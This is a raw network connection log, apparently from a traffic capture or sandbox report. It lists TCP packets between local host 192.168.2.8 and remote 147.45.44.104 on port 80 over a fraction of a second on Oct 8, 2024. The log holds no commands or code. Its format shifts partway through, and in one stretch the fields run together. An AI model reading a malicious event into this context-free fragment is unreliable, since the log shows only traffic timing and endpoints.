Oct 8, 2024 03:23:05.031311035 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031321049 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031337976 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031387091 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.031407118 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031418085 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031428099 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031441927 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031450987 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.031492949 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.032370090 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032381058 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032397985 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032422066 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.032449007 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032453060 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.032461882 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032480955 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032489061 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032501936 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.032524109 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032535076 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.032540083 CEST  49706        80         192.168.2.8    147.45.44.104
                                                                              Oct 8, 2024 03:23:05.032555103 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.032565117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.032567024 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.032582998 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.032622099 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.032974005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033015966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033016920 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033026934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033070087 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033112049 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033123016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033139944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033152103 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033165932 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033169031 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033202887 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033222914 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033266068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033266068 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033277035 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033294916 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033304930 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033324957 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033349991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033356905 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033360958 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033380985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033397913 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033420086 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033432007 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033447981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033463001 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033463001 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033493042 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033497095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033508062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033524990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033533096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.033557892 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033591032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.033782005 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034239054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034269094 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034280062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034323931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034367085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034372091 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034379005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034395933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034404993 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034416914 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034434080 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034460068 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034467936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034512997 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034637928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034657955 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034672022 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034686089 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034699917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034706116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034715891 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034734011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034742117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.034754038 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.034792900 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035259962 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035290003 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035303116 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035336018 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035346031 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035356998 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035375118 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035399914 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035406113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035415888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035439014 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035461903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035499096 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035587072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035629034 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035639048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035648108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035680056 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035690069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035695076 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035710096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035725117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035732985 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.035756111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.035792112 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.036612988 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036668062 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036670923 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.036679029 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036712885 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036722898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036731005 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.036741972 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036768913 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.036823988 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036834955 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.036868095 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.069226980 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069248915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069291115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069312096 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069319963 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.069324017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069344997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069377899 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.069400072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069411039 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.069447041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.113105059 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113116980 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113152027 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113166094 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113174915 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.113181114 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113198996 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113229036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113230944 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.113240004 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.113256931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.113296032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.115919113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.115952969 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.115963936 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.115998983 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.116018057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116029024 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116045952 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116064072 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.116066933 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116084099 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116096973 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116106987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.116127968 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.116835117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116872072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116880894 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116934061 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.116962910 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116975069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.116991997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117011070 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117041111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117053032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117070913 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117084980 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117089033 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117132902 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117149115 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117192030 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117232084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117244005 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117279053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117280006 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117289066 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117345095 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117655039 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117747068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117758036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117774963 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117789984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117799997 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117805004 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117818117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117834091 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.117851019 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.117877007 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.118052959 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118083000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118097067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118128061 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.118155956 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118168116 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118185043 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118196964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.118206978 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.118247032 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.119131088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119174004 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.119184017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119194984 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119230986 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.119240999 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119251966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119267941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:05.119293928 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:05.119352102 CEST8049706147.45.44.104192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:23:05.119363070 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119379044 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119405985 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119406939 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119419098 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119438887 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119438887 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119455099 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119466066 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119483948 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119524956 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119631052 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119683027 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119693995 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119705915 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119721889 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119749069 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119786024 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119796038 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119812965 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119821072 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.119832039 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.119860888 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120137930 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120147943 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120162964 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120187998 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120207071 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120215893 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120225906 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120242119 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120249987 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120264053 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120270014 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120289087 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120299101 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120311975 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120313883 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120341063 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120362043 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120388985 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120394945 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120404959 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120420933 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120428085 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.120448112 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.120486975 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.122042894 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122109890 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122123957 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122170925 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122181892 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122193098 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122200012 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.122210979 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.122216940 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.122242928 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123023987 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123055935 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123068094 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123070955 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123111963 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123152971 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123159885 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123161077 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123162031 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123166084 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123194933 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123215914 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123244047 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123250961 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123258114 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123275042 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123300076 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123302937 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123311043 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123328924 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123337030 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.123342037 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.123368979 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.124102116 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124114990 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124130011 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124155998 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124157906 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.124166965 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124187946 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124198914 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.124213934 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.124241114 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.177150011 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177175999 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177198887 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177243948 CEST | 49706 | 80 | 192.168.2.8 | 147.45.44.104
Oct 8, 2024 03:23:05.177258968 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177272081 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
Oct 8, 2024 03:23:05.177289963 CEST | 80 | 49706 | 147.45.44.104 | 192.168.2.8
